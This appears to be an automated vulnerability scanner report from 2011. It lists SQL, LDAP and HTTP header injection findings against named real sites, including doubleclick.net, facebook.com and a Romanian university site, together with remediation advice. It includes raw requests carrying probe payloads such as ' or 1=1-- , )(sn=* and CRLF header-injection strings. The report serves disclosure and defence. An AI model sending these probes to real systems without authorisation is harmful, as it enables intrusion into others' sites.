XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 07202011-03

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

One common defence is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defence is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defence may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defence to be bypassed.
Another often cited defence is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.

1.1. http://cm.g.doubleclick.net/pixel [id cookie] next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://cm.g.doubleclick.net
Path:	/pixel

Issue detail

The id cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the id cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /pixel?google_nid=admeld&google_cm&google_sc&admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd599&admeld_adprovider_id=832&admeld_call_type=redirect&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: cm.g.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/bostonglobe/300x250/bg_1064637_61606228?t=1311108266616&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2FBoston%2Fbusinessupdates%2F2011%2F07%2Fstate-street-announces-more-job-cuts%2F2Ah9Wno4Q7WHDubEEBBYLN%2Findex.html%3Fp1%3DNews_links&refer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue
Cookie: id=2253b03f0e0100a7|1365243/25505/15169|t=1308836888|et=730|cs=002213fd481abe33e2cc59585e'

Response 1 (redirected)

HTTP/1.1 302 Found
Location: http://tag.admeld.com/match?admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd599&admeld_adprovider_id=832&admeld_call_type=redirect&google_error=0
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Tue, 19 Jul 2011 20:47:12 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 354
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://tag.admeld.com/match?adme
...[SNIP]...

Request 2

Response 2

HTTP/1.1 302 Found
Location: http://tag.admeld.com/match?admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd599&admeld_adprovider_id=832&admeld_call_type=redirect&external_user_id=CAESEEm-rSLvlOjzT4MOGrRtRVA&google_cver=1
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Tue, 19 Jul 2011 20:47:13 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 402
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://tag.admeld.com/match?adme
...[SNIP]...

1.2. http://umfcluj.ro/Detaliu.aspx [t parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://umfcluj.ro
Path:	/Detaliu.aspx

Issue detail

The t parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the t parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /Detaliu.aspx?t=Medicina-dentara-Oferta-educationala' HTTP/1.1
Host: umfcluj.ro
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://umfcluj.ro/lista.aspx?t=Studenti-actuali-Prezentare
Cookie: ASP.NET_SessionId=nm2p4tbhojuu3jyfqb310euy; __utma=234819994.717153536.1311096678.1311096678.1311096678.1; __utmb=234819994.1.10.1311096678; __utmc=234819994; __utmz=234819994.1311096678.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response 1

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:37:31 GMT
Content-Length: 6426

<html>
<head>
<title>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''Medicina-dentara-Oferta-educationala''  group by YEAR(StartDate), MONTH(StartDa' at line 4</titl
...[SNIP]...

Request 2

GET /Detaliu.aspx?t=Medicina-dentara-Oferta-educationala'' HTTP/1.1
Host: umfcluj.ro
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://umfcluj.ro/lista.aspx?t=Studenti-actuali-Prezentare
Cookie: ASP.NET_SessionId=nm2p4tbhojuu3jyfqb310euy; __utma=234819994.717153536.1311096678.1311096678.1311096678.1; __utmb=234819994.1.10.1311096678; __utmc=234819994; __utmz=234819994.1311096678.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:37:34 GMT
Content-Length: 59690

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>UMF</title>
<meta name="description" content="" />
<meta name="keywords" content=
...[SNIP]...

1.3. http://umfcluj.ro/lista.aspx [t parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://umfcluj.ro
Path:	/lista.aspx

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /lista.aspx?t=Admitere-Prezentare' HTTP/1.1
Host: umfcluj.ro
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uv0adfzgil2a3n55ieywykip; __utma=234819994.469475746.1311095567.1311095567.1311095567.1; __utmb=234819994.1.10.1311095567; __utmc=234819994; __utmz=234819994.1311095567.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response 1

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:13:57 GMT
Content-Length: 6990

<html>
<head>
<title>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ro-RO'<br> WHERE Type = 'Admit
...[SNIP]...

Request 2

GET /lista.aspx?t=Admitere-Prezentare'' HTTP/1.1
Host: umfcluj.ro
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uv0adfzgil2a3n55ieywykip; __utma=234819994.469475746.1311095567.1311095567.1311095567.1; __utmb=234819994.1.10.1311095567; __utmc=234819994; __utmz=234819994.1311095567.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:13:59 GMT
Content-Length: 78615

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Universitatea de Medicina si Farmacie Iuliu Hatieganu, Cluj-Napoca</title>
<meta n
...[SNIP]...

1.4. http://www.facebook.com/plugins/like.php [datr cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The datr cookie appears to be vulnerable to SQL injection attacks. The payloads 30846501'%20or%201%3d1--%20 and 30846501'%20or%201%3d2--%20 were each submitted in the datr cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /plugins/like.php?href=http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html&layout=standard&show_faces=false&width=425&font=arial&colorscheme=light&ref=blogindex HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: datr=i0EBThVgj6dG_aF4zAL0iwRb30846501'%20or%201%3d1--%20

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.148.39
X-Cnection: close
Date: Tue, 19 Jul 2011 20:45:03 GMT
Content-Length: 25038

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like | Facebook</title><style>body{background:#fff;font-size: 11px;font-family:"lucida grande",tahoma,verdana,arial,sans-serif;color:#333;margin:0;padding:0;text-align:left;direction:ltr;unicode-bidi:embed}
h1, h2, h3, h4, h5, h6{font-size: 13px;color:#333;margin:0;padding:0}
h1{font-size: 14px}
h4, h5{font-size: 11px}
p{margin:1em 0}
a{cursor:pointer;color:#3b5998;-moz-outline-style:none;text-decoration:none}
a:hover{text-decoration:underline}
img{border:0}
td,
td.label{font-size: 11px;text-align:left}
dd{color:#000}
dt{color:#777}
ul{list-style-type:none;margin:0;padding:0}
abbr{border-bottom:none}
hr{background:#d9d9d9;border-width:0;color:#d9d9d9;height:1px}
.clearfix:after{clear:both;content:".";display:block;font-size:0;height:0;line-height:0;visibility:hidden}
.clearfix{display:block;zoom:1}
.datawrap{word-wrap:break-word}
.word_break{display:block;float:left;margin-left:-10px;padding:0}
.img_loading{position:absolute;left:-100000px;top:-100000px}
.aero{opacity:.5}
.column{float:left}
.center{margin-left:auto;margin-right:auto}
#facebook .hidden_elem{display:none !important}
#facebook .invisible_elem{visibility:hidden}
.direction_ltr{direction:ltr}
.direction_rtl{direction:rtl}
.text_align_ltr{text-align:left}
.text_align_rtl{text-align:right}
body.plugin{background:transparent;overflow-y:visible}
body.transparent_widget{background-color:transparent;overflow:hidden}
body.plugin.transparent_widget{overflow-y:hidden}
.connect_widget{background-color:transparent}
.connect_widget .connect_widget_facebook_favicon{background:url(http://static.ak.fbcdn.net/rsrc.php/v1/z7/r/ql9vukDCc4R.png) no-repeat -1px -47px transparent;display:block;height:14px;padding:0 0 0 0;width:14px;position:absolute;left:-1px}
.connect_widget .connect_widget_interactive_area{border-collapse:collapse}
.connect_widget td.connect_widget_vertical_center{border-spacing:0;font-size: 11px;line-height:normal;padding:0}
.connect_widget td.connect_widget_button_cell{vertical-align:top}
.connect_widget td.connect_widget_co
...[SNIP]...

Request 2

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.149.54
X-Cnection: close
Date: Tue, 19 Jul 2011 20:45:04 GMT
Content-Length: 6617

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like | Facebook</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yM/r/zHNaHvAFp7N.css" />
<script>onloadhooks=[];onloadRegister=function(a){onloadhooks.push(a);};onafterloadhooks=[];onafterloadRegister=function(a){onafterloadhooks.push(a);};var AsyncLoader=(function(){var e=document.getElementsByTagName('head')[0],g=0,f=false,b=function(){if(document.readyState in {loaded:1,complete:1}){document.detachEvent("onreadystatechange",b);a('t_domcontent');}},c=function(){g--;d();},d=function(){if(g===0&&f===true){_onloadHook();a('t_layout');a('t_onload');_onafterloadHook();}},a=function(h){if(CavalryLogger)CavalryLogger.getInstance().setTimeStamp(h);};return {load:function(h){var i=0,j;for(;i<h.length;i++){j=document.createElement('script');j.src=h[i];j.async=true;j.onload=c;j.onreadystatechange=function(){if(j.readyState in {loaded:1,complete:1}){c();j.onreadystatechange=null;}};g++;e.appendChild(j);}window.onload=function(){f=true;d();};if(CavalryLogger)if(window.addEventListener){window.addEventListener('DOMContentLoaded',function(){a('t_domcontent');},false);}else if(document.attachEvent)document.attachEvent("onreadystatechange",b);},loadCSS:function(h){var i=document.createElement('link');i.rel="stylesheet";i.type="text/css";i.media="all";i.href=h;e.appendChild(i);}};})();
AsyncLoader.load(["http:\/\/static.ak.fbcdn.net\/rsrc.php\/v1\/y3\/r\/4M_1PP4LZN8.js"]);</script></head><body class="plugin transparent_widget ff3 Locale_en_US"><div id="FB_HiddenContainer" style="position:absolute; top:-10000px; width:0px; height:0px;"></div><div id="LikePluginPagelet"><div id="connect_widget_4e25ecd01fc876681075271" class="connect_widget" style="font-family: "arial", sans-serif"><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_lik
...[SNIP]...

2. LDAP injection previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The datr cookie appears to be vulnerable to LDAP injection attacks.

The payloads ddad234c5be87454)(sn=* and ddad234c5be87454)!(sn=* were each submitted in the datr cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.

Request 1

GET /plugins/like.php?action=recommend&api_key=140669015975185&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df31a2e41bc%26origin%3Dhttp%253A%252F%252Fwww.ticketmaster.com%252Ffc54d770c%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&href=http%3A%2F%2Fo.socl.be%2Fnbl0lg03&layout=standard&locale=en_US&node_type=link&ref=tmus67EventLikeButton-1287641246826c&sdk=joey&show_faces=true&width=300 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ticketmaster.com/event/000043582C516D43?artistid=736365&majorcatid=10001&minorcatid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ddad234c5be87454)(sn=*; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.48.45
X-Cnection: close
Date: Tue, 19 Jul 2011 18:38:37 GMT
Content-Length: 6945

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like | Facebook</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yJ/r/gn-vukSYjxu.css" />
<script>onloadhooks=[];onloadRegister=function(a){onloadhooks.push(a);};onafterloadhooks=[];onafterloadRegister=function(a){onafterloadhooks.push(a);};var AsyncLoader=(function(){var e=document.getElementsByTagName('head')[0],g=0,f=false,b=function(){if(document.readyState in {loaded:1,complete:1}){document.detachEvent("onreadystatechange",b);a('t_domcontent');}},c=function(){g--;d();},d=function(){if(g===0&&f===true){_onloadHook();a('t_layout');a('t_onload');_onafterloadHook();}},a=function(h){if(CavalryLogger)CavalryLogger.getInstance().setTimeStamp(h);};return {load:function(h){var i=0,j;for(;i<h.length;i++){j=document.createElement('script');j.src=h[i];j.async=true;j.onload=c;j.onreadystatechange=function(){if(j.readyState in {loaded:1,complete:1}){c();j.onreadystatechange=null;}};g++;e.appendChild(j);}window.onload=function(){f=true;d();};if(CavalryLogger)if(window.addEventListener){window.addEventListener('DOMContentLoaded',function(){a('t_domcontent');},false);}else if(document.attachEvent)document.attachEvent("onreadystatechange",b);},loadCSS:function(h){var i=document.createElement('link');i.rel="stylesheet";i.type="text/css";i.media="all";i.href=h;e.appendChild(i);}};})();
AsyncLoader.load(["http:\/\/static.ak.fbcdn.net\/rsrc.php\/v1\/y3\/r\/4M_1PP4LZN8.js"]);</script></head><body class="plugin transparent_widget safari4 win Locale_en_US"><div id="FB_HiddenContainer" style="position:absolute; top:-10000px; width:0px; height:0px;"></div><div id="LikePluginPagelet"><div id="connect_widget_4e25cf2dda74b9297241635" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></
...[SNIP]...

Request 2

GET /plugins/like.php?action=recommend&api_key=140669015975185&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df31a2e41bc%26origin%3Dhttp%253A%252F%252Fwww.ticketmaster.com%252Ffc54d770c%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&href=http%3A%2F%2Fo.socl.be%2Fnbl0lg03&layout=standard&locale=en_US&node_type=link&ref=tmus67EventLikeButton-1287641246826c&sdk=joey&show_faces=true&width=300 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ticketmaster.com/event/000043582C516D43?artistid=736365&majorcatid=10001&minorcatid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ddad234c5be87454)!(sn=*; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.174.25
X-Cnection: close
Date: Tue, 19 Jul 2011 18:38:38 GMT
Content-Length: 25372

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like | Facebook</title><style>body{background:#fff;font-size: 11px;font-family:"lucida grande",tahoma,verdana,arial,sans-serif;color:#333;margin:0;padding:0;text-align:left;direction:ltr;unicode-bidi:embed}
h1, h2, h3, h4, h5, h6{font-size: 13px;color:#333;margin:0;padding:0}
h1{font-size: 14px}
h4, h5{font-size: 11px}
p{margin:1em 0}
a{cursor:pointer;color:#3b5998;-moz-outline-style:none;text-decoration:none}
a:hover{text-decoration:underline}
img{border:0}
td,
td.label{font-size: 11px;text-align:left}
dd{color:#000}
dt{color:#777}
ul{list-style-type:none;margin:0;padding:0}
abbr{border-bottom:none}
hr{background:#d9d9d9;border-width:0;color:#d9d9d9;height:1px}
.clearfix:after{clear:both;content:".";display:block;font-size:0;height:0;line-height:0;visibility:hidden}
.clearfix{display:block;zoom:1}
.datawrap{word-wrap:break-word}
.word_break{display:block;float:left;margin-left:-10px;padding:0}
.img_loading{position:absolute;left:-100000px;top:-100000px}
.aero{opacity:.5}
.column{float:left}
.center{margin-left:auto;margin-right:auto}
#facebook .hidden_elem{display:none !important}
#facebook .invisible_elem{visibility:hidden}
.direction_ltr{direction:ltr}
.direction_rtl{direction:rtl}
.text_align_ltr{text-align:left}
.text_align_rtl{text-align:right}
body.plugin{background:transparent;overflow-y:visible}
body.transparent_widget{background-color:transparent;overflow:hidden}
body.plugin.transparent_widget{overflow-y:hidden}
.connect_widget{background-color:transparent}
.connect_widget .connect_widget_facebook_favicon{background:url(http://static.ak.fbcdn.net/rsrc.php/v1/z7/r/ql9vukDCc4R.png) no-repeat -1px -47px transparent;display:block;height:14px;padding:0 0 0 0;width:14px;position:absolute;left:-1px}
.connect_widget .connect_widget_interactive_area{border-collapse:collapse}
.connect_widget td.connect_widget_vertical_center{border-spacing:0;font-size: 11px;line-height:normal;padding:0}
.connect_widget td.connect_widget_button_cell{vertical-align:top}
.connect_widget td.connect_widget_co
...[SNIP]...

3. HTTP header injection previous next
There are 3 instances of this issue:

http://ad.doubleclick.net/adi/N1558.NetMining/B5146585.127 [REST URL parameter 1]
http://ad.doubleclick.net/adj/cm.quadbostonglobe/ [REST URL parameter 1]
http://matcher.bidder7.mookie1.com/google [cver parameter]

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.

3.1. http://ad.doubleclick.net/adi/N1558.NetMining/B5146585.127 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N1558.NetMining/B5146585.127

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 3d907%0d%0aabe9ed35d54 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /3d907%0d%0aabe9ed35d54/N1558.NetMining/B5146585.127;sz=728x90;pc=%5BTPAS_ID%5D;ord=1311108175;click=http://ads.undertone.com/c?oaparams=2__bannerid=174266__campaignid=28159__zoneid=16565__UTLCA=1__ptm=1671__cb=94bf6c6737ee486194ee917598e78a1c__bk=lolljh__id=2vaimk2c7zwrks2trxj9vaxbr__oadest=;? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://a.netmng.com/hic/?nm_width=728&nm_height=90&nm_publ=201&nm_c=250&beacon=November2010&url=Undertone&passback&click=http://ads.undertone.com/c?oaparams=2__bannerid=174266__campaignid=28159__zoneid=16565__UTLCA=1__ptm=1671__cb=94bf6c6737ee486194ee917598e78a1c__bk=lolljh__id=2vaimk2c7zwrks2trxj9vaxbr__oadest=
Cookie: id=2253b03f0e0100a7|1365243/25505/15169|t=1308836888|et=730|cs=002213fd481abe33e2cc59585e

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/3d907
abe9ed35d54/N1558.NetMining/B5146585.127;sz=728x90;pc=[TPAS_ID];ord=1311108175;click=http: //ads.undertone.com/c
Date: Tue, 19 Jul 2011 20:43:37 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.2. http://ad.doubleclick.net/adj/cm.quadbostonglobe/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/cm.quadbostonglobe/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 4f343%0d%0a9db56c3167b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /4f343%0d%0a9db56c3167b/cm.quadbostonglobe/;net=cm;u=,cm-10210473643_1311108278,11fda490648f83c,none,ax.340-bz.25;;cmw=nowl;sz=160x600;net=cm;env=ifr;ord1=551186;contx=none;an=340;dc=w;btg=bz.25;ord=1311108273? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
